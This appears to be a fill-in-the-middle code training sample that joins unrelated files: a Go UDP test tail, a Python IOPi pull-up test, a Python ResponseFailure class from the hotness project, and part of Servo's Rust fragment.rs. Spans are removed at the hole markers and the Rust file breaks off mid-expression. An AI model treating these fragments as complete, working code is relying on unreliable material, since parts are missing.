t.Fatalf("udpConn.Read %s", err) } receiveChan <- buffer[:n] close(receiveChan) udpConn.Close() }() return receiveChan, nil }<|fim▁end|>
<|file_name|>get_bus_pullups.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python """ ================================================ ABElectronics IO Pi Tests | test get_bus_pullups function Requires python smbus to be installed For Python 2 install with: sudo apt-get install python-smbus For Python 3 install with: sudo apt-get install python3-smbus run with: python3 get_bus_pullups.py ================================================ This test validates the get_bus_pullups function in the IOPi class. === Expected Result ============================ > Console Output: Test Passed """ from __future__ import absolute_import, division, print_function, \ unicode_literals try: import sys sys.path.append("..") from IOPi import IOPi except ImportError: raise ImportError("Failed to import IOPi library") def main(): """ Main program function """<|fim▁hole|> passed = True iopi = IOPi(0x20, False) # new iopi object without initialisation for a in range(1, 65536): iopi.set_bus_pullups(a) x = iopi.get_bus_pullups() if x != a: passed = False break iopi.set_bus_pullups(a) x = iopi.get_bus_pullups() if x != a: passed = False break if passed is False: print("Test Failed") else: print("Test Passed") if __name__ == "__main__": main()<|fim▁end|>
<|file_name|>response_failure.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # Copyright (C) 2021 Red Hat, Inc. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import traceback from typing import Any, Optional, List from hotness.exceptions import BaseHotnessException from hotness.requests import Request from hotness.responses import Response class ResponseFailure(Response): """ Class that represents failure response returned from use case. It is send when some exception happen during the use case. Defines constants for error types. Attributes: type: Type of the failure. message: Error message. traceback: Exception traceback as string. use_case_value: Partial use case output from Exception, if provided. """ VALIDATOR_ERROR = "ValidatorError" BUILDER_ERROR = "BuilderError" DATABASE_ERROR = "DatabaseError" NOTIFIER_ERROR = "NotifierError" PATCHER_ERROR = "PatcherError" INVALID_REQUEST_ERROR = "InvalidRequestError" def __init__(self, type: str, message: Any) -> None: """ Class constructor. """ self.type = type self.message = self._format_message(message) self.traceback = self._get_stack_trace(message) self.use_case_value = self._get_value(message) def _get_value(self, message: Any) -> Optional[dict]: """ Retrieves the use case value information from Exception, otherwise just returns empty dict. Params: message: Input to retrieve use case value from Returns: Value if message is Exception, otherwise None """ value = None if isinstance(message, BaseHotnessException): value = message.value return value def _get_stack_trace(self, message: Any) -> List[str]: """ Retrieves the stack trace information from Exception, otherwise just returns empty list. Params: message: Input to retrieve stack trace from Returns: Stack trace if message is Exception, otherwise empty string """ stack_trace = [] if isinstance(message, Exception): stack_trace = traceback.format_tb(message.__traceback__) return stack_trace def _format_message(self, message: Any) -> Any: """ Formats the input message if the message inherits from Exception, otherwise just return it back. Params: message: Input message to format Returns: String if exception, otherwise return the same object we received. """ if isinstance(message, Exception): return "{}: {}".format(message.__class__.__name__, "{}".format(message)) return message @property def value(self):<|fim▁hole|> """ Returns the dict representation of the failure response. """ return { "type": self.type, "message": self.message, "use_case_value": self.use_case_value, } def __bool__(self) -> bool: """ Boolean representation of response. """ return False @classmethod def validator_error(cls, message: Any) -> "ResponseFailure": """ Creates response for validator failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure( type=ResponseFailure.VALIDATOR_ERROR, message=message ) return response @classmethod def builder_error(cls, message: Any) -> "ResponseFailure": """ Creates response for builder failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.BUILDER_ERROR, message=message) return response @classmethod def database_error(cls, message: Any) -> "ResponseFailure": """ Creates response for database failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.DATABASE_ERROR, message=message) return response @classmethod def notifier_error(cls, message: Any) -> "ResponseFailure": """ Creates response for notifier failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.NOTIFIER_ERROR, message=message) return response @classmethod def patcher_error(cls, message: Any) -> "ResponseFailure": """ Creates response for patcher failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.PATCHER_ERROR, message=message) return response @classmethod def invalid_request_error(cls, request: Request) -> "ResponseFailure": """ Creates response for invalid request failure. Params: request: Invalid request to add to this error Returns: ResponseFailure object """ response = ResponseFailure( type=ResponseFailure.INVALID_REQUEST_ERROR, message=str(request.errors) ) return response<|fim▁end|>
<|file_name|>fragment.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ //! The `Fragment` type, which represents the leaves of the layout tree. #![deny(unsafe_code)] use ServoArc; use app_units::Au; use canvas_traits::canvas::CanvasMsg; use context::{LayoutContext, with_thread_local_font_context}; use euclid::{Transform3D, Point2D, Vector2D, Rect, Size2D}; use floats::ClearType; use flow::{self, ImmutableFlowUtils}; use flow_ref::FlowRef; use gfx; use gfx::display_list::{BLUR_INFLATION_FACTOR, OpaqueNode}; use gfx::text::glyph::ByteIndex; use gfx::text::text_run::{TextRun, TextRunSlice}; use gfx_traits::StackingContextId; use inline::{InlineFragmentNodeFlags, InlineFragmentContext, InlineFragmentNodeInfo}; use inline::{InlineMetrics, LineMetrics}; use ipc_channel::ipc::IpcSender; #[cfg(debug_assertions)] use layout_debug; use model::{self, IntrinsicISizes, IntrinsicISizesContribution, MaybeAuto, SizeConstraint}; use model::style_length; use msg::constellation_msg::{BrowsingContextId, PipelineId}; use net_traits::image::base::{Image, ImageMetadata}; use net_traits::image_cache::{ImageOrMetadataAvailable, UsePlaceholder}; use range::*; use script_layout_interface::{HTMLCanvasData, HTMLCanvasDataSource}; use script_layout_interface::SVGSVGData; use script_layout_interface::wrapper_traits::{PseudoElementType, ThreadSafeLayoutElement, ThreadSafeLayoutNode}; use serde::ser::{Serialize, SerializeStruct, Serializer}; use servo_url::ServoUrl; use std::{f32, fmt}; use std::borrow::ToOwned; use std::cmp::{Ordering, max, min}; use std::collections::LinkedList; use std::sync::{Arc, Mutex}; use style::computed_values::{border_collapse, box_sizing, clear, color, display, mix_blend_mode}; use style::computed_values::{overflow_wrap, overflow_x, position, text_decoration_line}; use style::computed_values::{transform_style, white_space, word_break}; use style::computed_values::content::ContentItem; use style::logical_geometry::{Direction, LogicalMargin, LogicalRect, LogicalSize, WritingMode}; use style::properties::ComputedValues; use style::selector_parser::RestyleDamage; use style::servo::restyle_damage::ServoRestyleDamage; use style::str::char_is_whitespace; use style::values::{self, Either, Auto}; use style::values::computed::{Length, LengthOrPercentage, LengthOrPercentageOrAuto}; use style::values::generics::box_::VerticalAlign; use style::values::generics::transform; use text; use text::TextRunScanner; use webrender_api; use wrapper::ThreadSafeLayoutNodeHelpers; // From gfxFontConstants.h in Firefox. static FONT_SUBSCRIPT_OFFSET_RATIO: f32 = 0.20; static FONT_SUPERSCRIPT_OFFSET_RATIO: f32 = 0.34; // https://drafts.csswg.org/css-images/#default-object-size static DEFAULT_REPLACED_WIDTH: i32 = 300; static DEFAULT_REPLACED_HEIGHT: i32 = 150; /// Fragments (`struct Fragment`) are the leaves of the layout tree. They cannot position /// themselves. In general, fragments do not have a simple correspondence with CSS fragments in the /// specification: /// /// * Several fragments may correspond to the same CSS box or DOM node. For example, a CSS text box /// broken across two lines is represented by two fragments. /// /// * Some CSS fragments are not created at all, such as some anonymous block fragments induced by /// inline fragments with block-level sibling fragments. In that case, Servo uses an `InlineFlow` /// with `BlockFlow` siblings; the `InlineFlow` is block-level, but not a block container. It is /// positioned as if it were a block fragment, but its children are positioned according to /// inline flow. /// /// A `SpecificFragmentInfo::Generic` is an empty fragment that contributes only borders, margins, /// padding, and backgrounds. It is analogous to a CSS nonreplaced content box. /// /// A fragment's type influences how its styles are interpreted during layout. For example, /// replaced content such as images are resized differently from tables, text, or other content. /// Different types of fragments may also contain custom data; for example, text fragments contain /// text. /// /// Do not add fields to this structure unless they're really really mega necessary! Fragments get /// moved around a lot and thus their size impacts performance of layout quite a bit. /// /// FIXME(#2260, pcwalton): This can be slimmed down some by (at least) moving `inline_context` /// to be on `InlineFlow` only. #[derive(Clone)] pub struct Fragment { /// An opaque reference to the DOM node that this `Fragment` originates from. pub node: OpaqueNode, /// The CSS style of this fragment. pub style: ServoArc<ComputedValues>, /// The CSS style of this fragment when it's selected pub selected_style: ServoArc<ComputedValues>, /// The position of this fragment relative to its owning flow. The size includes padding and /// border, but not margin. /// /// NB: This does not account for relative positioning. /// NB: Collapsed borders are not included in this. pub border_box: LogicalRect<Au>, /// The sum of border and padding; i.e. the distance from the edge of the border box to the /// content edge of the fragment. pub border_padding: LogicalMargin<Au>, /// The margin of the content box. pub margin: LogicalMargin<Au>, /// Info specific to the kind of fragment. Keep this enum small. pub specific: SpecificFragmentInfo, /// Holds the style context information for fragments that are part of an inline formatting /// context. pub inline_context: Option<InlineFragmentContext>, /// How damaged this fragment is since last reflow. pub restyle_damage: RestyleDamage, /// The pseudo-element that this fragment represents. pub pseudo: PseudoElementType<()>, /// Various flags for this fragment. pub flags: FragmentFlags, /// A debug ID that is consistent for the life of this fragment (via transform etc). /// This ID should not be considered stable across multiple layouts or fragment /// manipulations. debug_id: DebugId, /// The ID of the StackingContext that contains this fragment. This is initialized /// to 0, but it assigned during the collect_stacking_contexts phase of display /// list construction. pub stacking_context_id: StackingContextId, } impl Serialize for Fragment { fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> { let mut serializer = serializer.serialize_struct("fragment", 3)?; serializer.serialize_field("id", &self.debug_id)?; serializer.serialize_field("border_box", &self.border_box)?; serializer.serialize_field("margin", &self.margin)?; serializer.end() } } /// Info specific to the kind of fragment. /// /// Keep this enum small. As in, no more than one word. Or pcwalton will yell at you. #[derive(Clone)] pub enum SpecificFragmentInfo { Generic, /// A piece of generated content that cannot be resolved into `ScannedText` until the generated /// content resolution phase (e.g. an ordered list item marker). GeneratedContent(Box<GeneratedContentInfo>), Iframe(IframeFragmentInfo), Image(Box<ImageFragmentInfo>), Canvas(Box<CanvasFragmentInfo>), Svg(Box<SvgFragmentInfo>), /// A hypothetical box (see CSS 2.1 § 10.3.7) for an absolutely-positioned block that was /// declared with `display: inline;`. InlineAbsoluteHypothetical(InlineAbsoluteHypotheticalFragmentInfo), InlineBlock(InlineBlockFragmentInfo), /// An inline fragment that establishes an absolute containing block for its descendants (i.e. /// a positioned inline fragment). InlineAbsolute(InlineAbsoluteFragmentInfo), ScannedText(Box<ScannedTextFragmentInfo>), Table, TableCell, TableColumn(TableColumnFragmentInfo), TableRow, TableWrapper, Multicol, MulticolColumn, UnscannedText(Box<UnscannedTextFragmentInfo>), /// A container for a fragment that got truncated by text-overflow. /// "Totally truncated fragments" are not rendered at all. /// Text fragments may be partially truncated (in which case this renders like a text fragment). /// Other fragments can only be totally truncated or not truncated at all. TruncatedFragment(Box<TruncatedFragmentInfo>), } impl SpecificFragmentInfo { fn restyle_damage(&self) -> RestyleDamage { let flow = match *self { SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::UnscannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Generic => return RestyleDamage::empty(), SpecificFragmentInfo::InlineAbsoluteHypothetical(ref info) => &info.flow_ref, SpecificFragmentInfo::InlineAbsolute(ref info) => &info.flow_ref, SpecificFragmentInfo::InlineBlock(ref info) => &info.flow_ref, }; flow::base(&**flow).restyle_damage } pub fn get_type(&self) -> &'static str { match *self { SpecificFragmentInfo::Canvas(_) => "SpecificFragmentInfo::Canvas", SpecificFragmentInfo::Generic => "SpecificFragmentInfo::Generic", SpecificFragmentInfo::GeneratedContent(_) => "SpecificFragmentInfo::GeneratedContent", SpecificFragmentInfo::Iframe(_) => "SpecificFragmentInfo::Iframe", SpecificFragmentInfo::Image(_) => "SpecificFragmentInfo::Image", SpecificFragmentInfo::InlineAbsolute(_) => "SpecificFragmentInfo::InlineAbsolute", SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => { "SpecificFragmentInfo::InlineAbsoluteHypothetical" } SpecificFragmentInfo::InlineBlock(_) => "SpecificFragmentInfo::InlineBlock", SpecificFragmentInfo::ScannedText(_) => "SpecificFragmentInfo::ScannedText", SpecificFragmentInfo::Svg(_) => "SpecificFragmentInfo::Svg", SpecificFragmentInfo::Table => "SpecificFragmentInfo::Table", SpecificFragmentInfo::TableCell => "SpecificFragmentInfo::TableCell", SpecificFragmentInfo::TableColumn(_) => "SpecificFragmentInfo::TableColumn", SpecificFragmentInfo::TableRow => "SpecificFragmentInfo::TableRow", SpecificFragmentInfo::TableWrapper => "SpecificFragmentInfo::TableWrapper", SpecificFragmentInfo::Multicol => "SpecificFragmentInfo::Multicol", SpecificFragmentInfo::MulticolColumn => "SpecificFragmentInfo::MulticolColumn", SpecificFragmentInfo::UnscannedText(_) => "SpecificFragmentInfo::UnscannedText", SpecificFragmentInfo::TruncatedFragment(_) => "SpecificFragmentInfo::TruncatedFragment" } } } impl fmt::Debug for SpecificFragmentInfo { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { SpecificFragmentInfo::ScannedText(ref info) => write!(f, "{:?}", info.text()), SpecificFragmentInfo::UnscannedText(ref info) => write!(f, "{:?}", info.text), _ => Ok(()) } } } /// Information for generated content. #[derive(Clone)] pub enum GeneratedContentInfo { ListItem, ContentItem(ContentItem), /// Placeholder for elements with generated content that did not generate any fragments. Empty, } /// A hypothetical box (see CSS 2.1 § 10.3.7) for an absolutely-positioned block that was declared /// with `display: inline;`. /// /// FIXME(pcwalton): Stop leaking this `FlowRef` to layout; that is not memory safe because layout /// can clone it. #[derive(Clone)] pub struct InlineAbsoluteHypotheticalFragmentInfo { pub flow_ref: FlowRef, } impl InlineAbsoluteHypotheticalFragmentInfo { pub fn new(flow_ref: FlowRef) -> InlineAbsoluteHypotheticalFragmentInfo { InlineAbsoluteHypotheticalFragmentInfo { flow_ref: flow_ref, } } } /// A fragment that represents an inline-block element. /// /// FIXME(pcwalton): Stop leaking this `FlowRef` to layout; that is not memory safe because layout /// can clone it. #[derive(Clone)] pub struct InlineBlockFragmentInfo { pub flow_ref: FlowRef, } impl InlineBlockFragmentInfo { pub fn new(flow_ref: FlowRef) -> InlineBlockFragmentInfo { InlineBlockFragmentInfo { flow_ref: flow_ref, } } } /// An inline fragment that establishes an absolute containing block for its descendants (i.e. /// a positioned inline fragment). /// /// FIXME(pcwalton): Stop leaking this `FlowRef` to layout; that is not memory safe because layout /// can clone it. #[derive(Clone)] pub struct InlineAbsoluteFragmentInfo { pub flow_ref: FlowRef, } impl InlineAbsoluteFragmentInfo { pub fn new(flow_ref: FlowRef) -> InlineAbsoluteFragmentInfo { InlineAbsoluteFragmentInfo { flow_ref: flow_ref, } } } #[derive(Clone)] pub enum CanvasFragmentSource { WebGL(webrender_api::ImageKey), Image(Option<Arc<Mutex<IpcSender<CanvasMsg>>>>) } #[derive(Clone)] pub struct CanvasFragmentInfo { pub source: CanvasFragmentSource, pub dom_width: Au, pub dom_height: Au, } impl CanvasFragmentInfo { pub fn new(data: HTMLCanvasData) -> CanvasFragmentInfo { let source = match data.source { HTMLCanvasDataSource::WebGL(texture_id) => { CanvasFragmentSource::WebGL(texture_id) }, HTMLCanvasDataSource::Image(ipc_sender) => { CanvasFragmentSource::Image(ipc_sender.map(|renderer| Arc::new(Mutex::new(renderer)))) } }; CanvasFragmentInfo { source: source, dom_width: Au::from_px(data.width as i32), dom_height: Au::from_px(data.height as i32), } } } #[derive(Clone)] pub struct SvgFragmentInfo { pub dom_width: Au, pub dom_height: Au, } impl SvgFragmentInfo { pub fn new(data: SVGSVGData) -> SvgFragmentInfo { SvgFragmentInfo { dom_width: Au::from_px(data.width as i32), dom_height: Au::from_px(data.height as i32), } } } /// A fragment that represents a replaced content image and its accompanying borders, shadows, etc. #[derive(Clone)] pub struct ImageFragmentInfo { pub image: Option<Arc<Image>>, pub metadata: Option<ImageMetadata>, } impl ImageFragmentInfo { /// Creates a new image fragment from the given URL and local image cache. /// /// FIXME(pcwalton): The fact that image fragments store the cache in the fragment makes little /// sense to me. pub fn new<N: ThreadSafeLayoutNode>(url: Option<ServoUrl>, node: &N, layout_context: &LayoutContext) -> ImageFragmentInfo { let image_or_metadata = url.and_then(|url| { layout_context.get_or_request_image_or_meta(node.opaque(), url, UsePlaceholder::Yes) }); let (image, metadata) = match image_or_metadata { Some(ImageOrMetadataAvailable::ImageAvailable(i, _)) => { (Some(i.clone()), Some(ImageMetadata { height: i.height, width: i.width } )) } Some(ImageOrMetadataAvailable::MetadataAvailable(m)) => { (None, Some(m)) } None => { (None, None) } }; ImageFragmentInfo { image: image, metadata: metadata, } } pub fn tile_image_round(position: &mut Au, size: &mut Au, absolute_anchor_origin: Au, image_size: &mut Au) { if *size == Au(0) || *image_size == Au(0) { *position = Au(0); *size =Au(0); return; } let number_of_tiles = (size.to_f32_px() / image_size.to_f32_px()).round().max(1.0); *image_size = *size / (number_of_tiles as i32); ImageFragmentInfo::tile_image(position, size, absolute_anchor_origin, *image_size); } pub fn tile_image_spaced(position: &mut Au, size: &mut Au, tile_spacing: &mut Au, absolute_anchor_origin: Au, image_size: Au) { if *size == Au(0) || image_size == Au(0) { *position = Au(0); *size = Au(0); *tile_spacing = Au(0); return; } // Per the spec, if the space available is not enough for two images, just tile as // normal but only display a single tile. if image_size * 2 >= *size { ImageFragmentInfo::tile_image(position, size, absolute_anchor_origin, image_size); *tile_spacing = Au(0); *size = image_size; return; } // Take the box size, remove room for two tiles on the edges, and then calculate how many // other tiles fit in between them. let size_remaining = *size - (image_size * 2); let num_middle_tiles = (size_remaining.to_f32_px() / image_size.to_f32_px()).floor() as i32; // Allocate the remaining space as padding between tiles. background-position is ignored // as per the spec, so the position is just the box origin. We are also ignoring // background-attachment here, which seems unspecced when combined with // background-repeat: space. let space_for_middle_tiles = image_size * num_middle_tiles; *tile_spacing = (size_remaining - space_for_middle_tiles) / (num_middle_tiles + 1); } /// Tile an image pub fn tile_image(position: &mut Au, size: &mut Au, absolute_anchor_origin: Au, image_size: Au) { // Avoid division by zero below! if image_size == Au(0) { return } let delta_pixels = absolute_anchor_origin - *position; let image_size_px = image_size.to_f32_px(); let tile_count = ((delta_pixels.to_f32_px() + image_size_px - 1.0) / image_size_px).floor(); let offset = image_size * (tile_count as i32); let new_position = absolute_anchor_origin - offset; *size = *position - new_position + *size; *position = new_position; } } /// A fragment that represents an inline frame (iframe). This stores the frame ID so that the /// size of this iframe can be communicated via the constellation to the iframe's own layout thread. #[derive(Clone)] pub struct IframeFragmentInfo { /// The frame ID of this iframe. None if there is no nested browsing context. pub browsing_context_id: Option<BrowsingContextId>, /// The pipelineID of this iframe. None if there is no nested browsing context. pub pipeline_id: Option<PipelineId>, } impl IframeFragmentInfo { /// Creates the information specific to an iframe fragment. pub fn new<N: ThreadSafeLayoutNode>(node: &N) -> IframeFragmentInfo { let browsing_context_id = node.iframe_browsing_context_id(); let pipeline_id = node.iframe_pipeline_id(); IframeFragmentInfo { browsing_context_id: browsing_context_id, pipeline_id: pipeline_id, } } } /// A scanned text fragment represents a single run of text with a distinct style. A `TextFragment` /// may be split into two or more fragments across line breaks. Several `TextFragment`s may /// correspond to a single DOM text node. Split text fragments are implemented by referring to /// subsets of a single `TextRun` object. #[derive(Clone)] pub struct ScannedTextFragmentInfo { /// The text run that this represents. pub run: Arc<TextRun>, /// The intrinsic size of the text fragment. pub content_size: LogicalSize<Au>, /// The byte offset of the insertion point, if any. pub insertion_point: Option<ByteIndex>, /// The range within the above text run that this represents. pub range: Range<ByteIndex>, /// The endpoint of the above range, including whitespace that was stripped out. This exists /// so that we can restore the range to its original value (before line breaking occurred) when /// performing incremental reflow. pub range_end_including_stripped_whitespace: ByteIndex, pub flags: ScannedTextFlags, } bitflags! { pub struct ScannedTextFlags: u8 { /// Whether a line break is required after this fragment if wrapping on newlines (e.g. if /// `white-space: pre` is in effect). const REQUIRES_LINE_BREAK_AFTERWARD_IF_WRAPPING_ON_NEWLINES = 0x01; /// Is this fragment selected? const SELECTED = 0x02; } } impl ScannedTextFragmentInfo { /// Creates the information specific to a scanned text fragment from a range and a text run. pub fn new(run: Arc<TextRun>, range: Range<ByteIndex>, content_size: LogicalSize<Au>, insertion_point: Option<ByteIndex>, flags: ScannedTextFlags) -> ScannedTextFragmentInfo { ScannedTextFragmentInfo { run: run, range: range, insertion_point: insertion_point, content_size: content_size, range_end_including_stripped_whitespace: range.end(), flags: flags, } } pub fn text(&self) -> &str { &self.run.text[self.range.begin().to_usize() .. self.range.end().to_usize()] } pub fn requires_line_break_afterward_if_wrapping_on_newlines(&self) -> bool { self.flags.contains(ScannedTextFlags::REQUIRES_LINE_BREAK_AFTERWARD_IF_WRAPPING_ON_NEWLINES) } pub fn selected(&self) -> bool { self.flags.contains(ScannedTextFlags::SELECTED) } } /// Describes how to split a fragment. This is used during line breaking as part of the return /// value of `find_split_info_for_inline_size()`. #[derive(Clone, Debug)] pub struct SplitInfo { // TODO(bjz): this should only need to be a single character index, but both values are // currently needed for splitting in the `inline::try_append_*` functions. pub range: Range<ByteIndex>, pub inline_size: Au, } impl SplitInfo { fn new(range: Range<ByteIndex>, info: &ScannedTextFragmentInfo) -> SplitInfo { let inline_size = info.run.advance_for_range(&range); SplitInfo { range: range, inline_size: inline_size, } } } /// Describes how to split a fragment into two. This contains up to two `SplitInfo`s. pub struct SplitResult { /// The part of the fragment that goes on the first line. pub inline_start: Option<SplitInfo>, /// The part of the fragment that goes on the second line. pub inline_end: Option<SplitInfo>, /// The text run which is being split. pub text_run: Arc<TextRun>, } /// Describes how a fragment should be truncated. struct TruncationResult { /// The part of the fragment remaining after truncation. split: SplitInfo, /// The text run which is being truncated. text_run: Arc<TextRun>, } /// Data for an unscanned text fragment. Unscanned text fragments are the results of flow /// construction that have not yet had their inline-size determined. #[derive(Clone)] pub struct UnscannedTextFragmentInfo { /// The text inside the fragment. pub text: Box<str>, /// The selected text range. An empty range represents the insertion point. pub selection: Option<Range<ByteIndex>>, } impl UnscannedTextFragmentInfo { /// Creates a new instance of `UnscannedTextFragmentInfo` from the given text. #[inline] pub fn new(text: String, selection: Option<Range<ByteIndex>>) -> UnscannedTextFragmentInfo { UnscannedTextFragmentInfo { text: text.into_boxed_str(), selection: selection, } } } /// A fragment that represents a table column. #[derive(Clone, Copy)] pub struct TableColumnFragmentInfo { /// the number of columns a <col> element should span pub span: u32, } impl TableColumnFragmentInfo { /// Create the information specific to an table column fragment. pub fn new<N: ThreadSafeLayoutNode>(node: &N) -> TableColumnFragmentInfo { let element = node.as_element().unwrap(); let span = element.get_attr(&ns!(), &local_name!("span")) .and_then(|string| string.parse().ok()) .unwrap_or(0); TableColumnFragmentInfo { span: span, } } } /// A wrapper for fragments that have been truncated by the `text-overflow` property. /// This may have an associated text node, or, if the fragment was completely truncated, /// it may act as an invisible marker for incremental reflow. #[derive(Clone)] pub struct TruncatedFragmentInfo { pub text_info: Option<ScannedTextFragmentInfo>, pub full: Fragment, } impl Fragment { /// Constructs a new `Fragment` instance. pub fn new<N: ThreadSafeLayoutNode>(node: &N, specific: SpecificFragmentInfo, ctx: &LayoutContext) -> Fragment { let shared_context = ctx.shared_context(); let style = node.style(shared_context); let writing_mode = style.writing_mode; let mut restyle_damage = node.restyle_damage(); restyle_damage.remove(ServoRestyleDamage::RECONSTRUCT_FLOW); Fragment { node: node.opaque(), style: style, selected_style: node.selected_style(), restyle_damage: restyle_damage, border_box: LogicalRect::zero(writing_mode), border_padding: LogicalMargin::zero(writing_mode), margin: LogicalMargin::zero(writing_mode), specific: specific, inline_context: None, pseudo: node.get_pseudo_element_type().strip(), flags: FragmentFlags::empty(), debug_id: DebugId::new(), stacking_context_id: StackingContextId::root(), } } /// Constructs a new `Fragment` instance from an opaque node. pub fn from_opaque_node_and_style(node: OpaqueNode, pseudo: PseudoElementType<()>, style: ServoArc<ComputedValues>, selected_style: ServoArc<ComputedValues>, mut restyle_damage: RestyleDamage, specific: SpecificFragmentInfo) -> Fragment { let writing_mode = style.writing_mode; restyle_damage.remove(ServoRestyleDamage::RECONSTRUCT_FLOW); Fragment { node: node, style: style, selected_style: selected_style, restyle_damage: restyle_damage, border_box: LogicalRect::zero(writing_mode), border_padding: LogicalMargin::zero(writing_mode), margin: LogicalMargin::zero(writing_mode), specific: specific, inline_context: None, pseudo: pseudo, flags: FragmentFlags::empty(), debug_id: DebugId::new(), stacking_context_id: StackingContextId::root(), } } /// Creates an anonymous fragment just like this one but with the given style and fragment /// type. For the new anonymous fragment, layout-related values (border box, etc.) are reset to /// initial values. pub fn create_similar_anonymous_fragment(&self, style: ServoArc<ComputedValues>, specific: SpecificFragmentInfo) -> Fragment { let writing_mode = style.writing_mode; Fragment { node: self.node, style: style, selected_style: self.selected_style.clone(), restyle_damage: self.restyle_damage, border_box: LogicalRect::zero(writing_mode), border_padding: LogicalMargin::zero(writing_mode), margin: LogicalMargin::zero(writing_mode), specific: specific, inline_context: None, pseudo: self.pseudo, flags: FragmentFlags::empty(), debug_id: DebugId::new(), stacking_context_id: StackingContextId::root(), } } /// Transforms this fragment into another fragment of the given type, with the given size, /// preserving all the other data. pub fn transform(&self, size: LogicalSize<Au>, info: SpecificFragmentInfo) -> Fragment { let new_border_box = LogicalRect::from_point_size(self.style.writing_mode, self.border_box.start, size); let mut restyle_damage = RestyleDamage::rebuild_and_reflow(); restyle_damage.remove(ServoRestyleDamage::RECONSTRUCT_FLOW); Fragment { node: self.node, style: self.style.clone(), selected_style: self.selected_style.clone(), restyle_damage: restyle_damage, border_box: new_border_box, border_padding: self.border_padding, margin: self.margin, specific: info, inline_context: self.inline_context.clone(), pseudo: self.pseudo.clone(), flags: FragmentFlags::empty(), debug_id: self.debug_id.clone(), stacking_context_id: StackingContextId::root(), } } /// Transforms this fragment using the given `SplitInfo`, preserving all the other data. pub fn transform_with_split_info(&self, split: &SplitInfo, text_run: Arc<TextRun>) -> Fragment { let size = LogicalSize::new(self.style.writing_mode, split.inline_size, self.border_box.size.block); // Preserve the insertion point if it is in this fragment's range or it is at line end. let (flags, insertion_point) = match self.specific { SpecificFragmentInfo::ScannedText(ref info) => { match info.insertion_point { Some(index) if split.range.contains(index) => (info.flags, info.insertion_point), Some(index) if index == ByteIndex(text_run.text.chars().count() as isize - 1) && index == split.range.end() => (info.flags, info.insertion_point), _ => (info.flags, None) } }, _ => (ScannedTextFlags::empty(), None) }; let info = Box::new(ScannedTextFragmentInfo::new( text_run, split.range, size, insertion_point, flags, )); self.transform(size, SpecificFragmentInfo::ScannedText(info)) } /// Transforms this fragment into an ellipsis fragment, preserving all the other data. pub fn transform_into_ellipsis(&self, layout_context: &LayoutContext, text_overflow_string: String) -> Fragment { let mut unscanned_ellipsis_fragments = LinkedList::new(); let mut ellipsis_fragment = self.transform( self.border_box.size, SpecificFragmentInfo::UnscannedText( Box::new(UnscannedTextFragmentInfo::new(text_overflow_string, None)) ) ); unscanned_ellipsis_fragments.push_back(ellipsis_fragment); let ellipsis_fragments = with_thread_local_font_context(layout_context, |font_context| { TextRunScanner::new().scan_for_runs(font_context, unscanned_ellipsis_fragments) }); debug_assert!(ellipsis_fragments.len() == 1); ellipsis_fragment = ellipsis_fragments.fragments.into_iter().next().unwrap(); ellipsis_fragment.flags |= FragmentFlags::IS_ELLIPSIS; ellipsis_fragment } pub fn restyle_damage(&self) -> RestyleDamage { self.restyle_damage | self.specific.restyle_damage() } pub fn contains_node(&self, node_address: OpaqueNode) -> bool { node_address == self.node || self.inline_context.as_ref().map_or(false, |ctx| { ctx.contains_node(node_address) }) } /// Adds a style to the inline context for this fragment. If the inline context doesn't exist /// yet, it will be created. pub fn add_inline_context_style(&mut self, node_info: InlineFragmentNodeInfo) { if self.inline_context.is_none() { self.inline_context = Some(InlineFragmentContext::new()); } self.inline_context.as_mut().unwrap().nodes.push(node_info); } /// Determines which quantities (border/padding/margin/specified) should be included in the /// intrinsic inline size of this fragment. fn quantities_included_in_intrinsic_inline_size(&self) -> QuantitiesIncludedInIntrinsicInlineSizes { match self.specific { SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::Svg(_) => { QuantitiesIncludedInIntrinsicInlineSizes::all() } SpecificFragmentInfo::Table => { QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_PADDING | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } SpecificFragmentInfo::TableCell => { let base_quantities = QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_PADDING | 